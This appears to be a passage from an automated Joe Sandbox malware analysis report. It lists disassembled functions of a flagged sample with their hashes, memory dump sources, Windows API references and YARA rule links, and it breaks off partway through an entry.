                                                                                          • Opcode ID: 9f4ac20ccf8eaeb9be70354e821e93a75d62921bf587cb4724988e0744ee9ffa
                                                                                          • Instruction ID: a1eedc1a825862234bdac1173d0509d4ce773969669c6a7a67135c1844b76510
                                                                                          • Opcode Fuzzy Hash: 9f4ac20ccf8eaeb9be70354e821e93a75d62921bf587cb4724988e0744ee9ffa
                                                                                          • Instruction Fuzzy Hash: 0231E475D41208AFDB04CFA8D480AEEBBF6FF49310F10946AE911B7260DB719A45CB95
                                                                                          Function 6D006650 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
                                                                                          • Instruction ID: dc734126452572f49012c80787f47a328b66bf0b53a36d15014a8943f3b2713d
                                                                                          • Opcode Fuzzy Hash: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
                                                                                          • Instruction Fuzzy Hash: DA21E7367155525BE705CE2EC8808A6B7A7EF8D31471981F9E808CB283CA70E956C7D0
                                                                                          Function 6D008B30 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
                                                                                          • Instruction ID: e2798953af6df03b7078c826da3ccd91e01f19135ccb6ca6642e263bbd83af3a
                                                                                          • Opcode Fuzzy Hash: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
                                                                                          • Instruction Fuzzy Hash: DE218E757046874BF715CF2EC84059BBBA3FFD9300B1980A6E858DB242C674E866CBC0
                                                                                          Function 6D00C7B0 Relevance: .1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                                                                          • Instruction ID: c995d013d6b4a607ce1059dab05874f68589e52ebf06739c4820ad9230a156b6
                                                                                          • Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
                                                                                          • Instruction Fuzzy Hash: F711E63A709A430BF308CE2EE880593B7A7AFCD31476A85AEA458DF146C771E416C791
                                                                                          Function 6D00A7E0 Relevance: .1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
                                                                                          • Instruction ID: 1acc5000ec69cb1927d35a44301270338920092fe756200a66fa1f0c62c5c932
                                                                                          • Opcode Fuzzy Hash: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
                                                                                          • Instruction Fuzzy Hash: EE110632A056924BE7018E2DC8406D6BBA7EFCE710B1A81EAE854DF217C774991BC7D0
                                                                                          Function 0543B958 Relevance: .1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18bedcc6e9b90413334a9e00bffa9294d3a71957c983960659b6212fd25c34a5
                                                                                          • Instruction ID: 559514e96aed1c5316944d2ebcbcd40a193fd95b87581bcda7c8161503522f15
                                                                                          • Opcode Fuzzy Hash: 18bedcc6e9b90413334a9e00bffa9294d3a71957c983960659b6212fd25c34a5
                                                                                          • Instruction Fuzzy Hash: 0121AAB5D052188FCB10CFA9D584ADEFBF4EB49320F24906AE818B7320D735A945CF64
                                                                                          Function 6D0684B0 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a953b35a80c17118bd13644806be8d0a0585007b7190a097129057f0dbfbb29
                                                                                          • Instruction ID: e620dfe644fe52ce1683e0b67de751900f8c29a221c4f338d0604c9ea197d580
                                                                                          • Opcode Fuzzy Hash: 1a953b35a80c17118bd13644806be8d0a0585007b7190a097129057f0dbfbb29
                                                                                          • Instruction Fuzzy Hash: 05115EB6908649EFD704CF59D8417AAFBF4FB45720F10822EE81993B80E735A900CB90
                                                                                          Function 6D076FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • operator+.LIBCMT ref: 6D076FCC
                                                                                            • Part of subcall function 6D074147: DName::DName.LIBCMT ref: 6D07415A
                                                                                            • Part of subcall function 6D074147: DName::operator+.LIBCMT ref: 6D074161
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::Name::operator+operator+
                                                                                          • String ID:
                                                                                          • API String ID: 2937105810-0
                                                                                          • Opcode ID: 4c7fde43222f8823839001c450381a8b731bfe3a2e4fd1a1143668b34b3e022b
                                                                                          • Instruction ID: c6228defe87ac3cb6e42e600c6c40e0e5a39f02c8eaac97864529a00ce5a9b96
                                                                                          • Opcode Fuzzy Hash: 4c7fde43222f8823839001c450381a8b731bfe3a2e4fd1a1143668b34b3e022b
                                                                                          • Instruction Fuzzy Hash: 79D14E75D04209AFEF21DFA8C891BEEBBF4EF49344F11405AE611AB290DB319A45CB64
                                                                                          Function 6D06EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ECA5
                                                                                          • __mtterm.LIBCMT ref: 6D06ECB1
                                                                                            • Part of subcall function 6D06E97C: DecodePointer.KERNEL32(00000012,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06E98D
                                                                                            • Part of subcall function 6D06E97C: TlsFree.KERNEL32(0000000A,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06E9A7
                                                                                            • Part of subcall function 6D06E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D072325
                                                                                            • Part of subcall function 6D06E97C: DeleteCriticalSection.KERNEL32(0000000A,?,?,6D06A397,6D06A37D,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D07234F
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D06ECC7
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D06ECD4
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D06ECE1
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D06ECEE
                                                                                          • TlsAlloc.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED3E
                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED59
                                                                                          • __init_pointers.LIBCMT ref: 6D06ED63
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED74
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED81
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED8E
                                                                                          • EncodePointer.KERNEL32(?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06ED9B
                                                                                          • DecodePointer.KERNEL32(Function_0006EB00,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06EDBC
                                                                                          • __calloc_crt.LIBCMT ref: 6D06EDD1
                                                                                          • DecodePointer.KERNEL32(00000000,?,?,6D06A2D4,6D0995C0,00000008,6D06A468,?,?,?,6D0995E0,0000000C,6D06A523,?), ref: 6D06EDEB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6D06EDFD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                          • API String ID: 1868149495-3819984048
                                                                                          • Opcode ID: 08ce60f81d618ecb765895ad48c18f37affe4c09593b7c3bfa486cd470c32156
                                                                                          • Instruction ID: e1526ac859c60e3f4a3d9b1af9f74d206baff8211fa0835315627609b217cc29
                                                                                          • Opcode Fuzzy Hash: 08ce60f81d618ecb765895ad48c18f37affe4c09593b7c3bfa486cd470c32156
                                                                                          • Instruction Fuzzy Hash: 4B315336804B99AEEF10EF759C1872E3FF5BB4B61571A4526E424D3192EB708041CFA9
                                                                                          Function 6D010EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 1771113911-4289949731
                                                                                          • Opcode ID: 9927400a390486af5aecb216081916a523120380e7ca660a3959044f51998634
                                                                                          • Instruction ID: a521e6f58ed8857221416d7472a4ad788d4096bad87913ae3d8548ee7a3f4089
                                                                                          • Opcode Fuzzy Hash: 9927400a390486af5aecb216081916a523120380e7ca660a3959044f51998634
                                                                                          • Instruction Fuzzy Hash: F3B1A0707181459BFB19CE9DDC91B9EB3AAEB89304754891CF492CB741C770EC91C7A2
                                                                                          Function 6D077FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6D077FFF
                                                                                          • DName::operator=.LIBCMT ref: 6D078013
                                                                                          • DName::operator+=.LIBCMT ref: 6D078021
                                                                                          • UnDecorator::getPtrRefType.LIBCMT ref: 6D07804D
                                                                                          • UnDecorator::getDataIndirectType.LIBCMT ref: 6D0780CA
                                                                                          • UnDecorator::getBasicDataType.LIBCMT ref: 6D0780D3
                                                                                          • operator+.LIBCMT ref: 6D078166
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                          • String ID: std::nullptr_t$volatile
                                                                                          • API String ID: 2203807771-3726895890
                                                                                          • Opcode ID: eea33fdb7a36e2abb09367e756b40752152fa39321d1be6a9ebf22004d096c5e
                                                                                          • Instruction ID: dc662d425ab340a51d3506515491c0b21c84da8caeb462113f91e6396651b57c
                                                                                          • Opcode Fuzzy Hash: eea33fdb7a36e2abb09367e756b40752152fa39321d1be6a9ebf22004d096c5e
                                                                                          • Instruction Fuzzy Hash: 17417A71918509BFFB31CF54C880BAE7BB8FF06341F458169EA549F152D7319A828B9C
                                                                                          Function 6D025140 Relevance: 21.2, APIs: 14, Instructions: 203COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D025177
                                                                                            • Part of subcall function 6D032820: _malloc.LIBCMT ref: 6D032871
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6D0251B9
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D0251D5
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6D0251E5
                                                                                          • _memmove.LIBCMT ref: 6D0251FF
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D025208
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02522C
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6D025263
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02526C
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6D0252AD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0252B6
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6D0252D2
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02534E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D025358
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 452649785-0
                                                                                          • Opcode ID: d80ef5a91bf00a390d8638672f5ab71e98ddf1268e76d6f8a4ac0b5be5bea43f
                                                                                          • Instruction ID: 5bcb675747c298a3097184c31fffbc73efa4c8a195a197f40ce3996dff224bd8
                                                                                          • Opcode Fuzzy Hash: d80ef5a91bf00a390d8638672f5ab71e98ddf1268e76d6f8a4ac0b5be5bea43f
                                                                                          • Instruction Fuzzy Hash: BE712B75A0121AEFEB00CFA5C884BAFBBB9FF59304F008159E905D7240E774EA05CBA4
                                                                                          Function 6D01F95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01FA0F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01FA22
                                                                                          • SafeArrayGetElement.OLEAUT32 ref: 6D01FA5A
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D023B71
                                                                                            • Part of subcall function 6D023A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D023B83
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D026A08
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D026A15
                                                                                            • Part of subcall function 6D0269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D026A41
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D01DFF6
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01E003
                                                                                            • Part of subcall function 6D01DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01E02F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
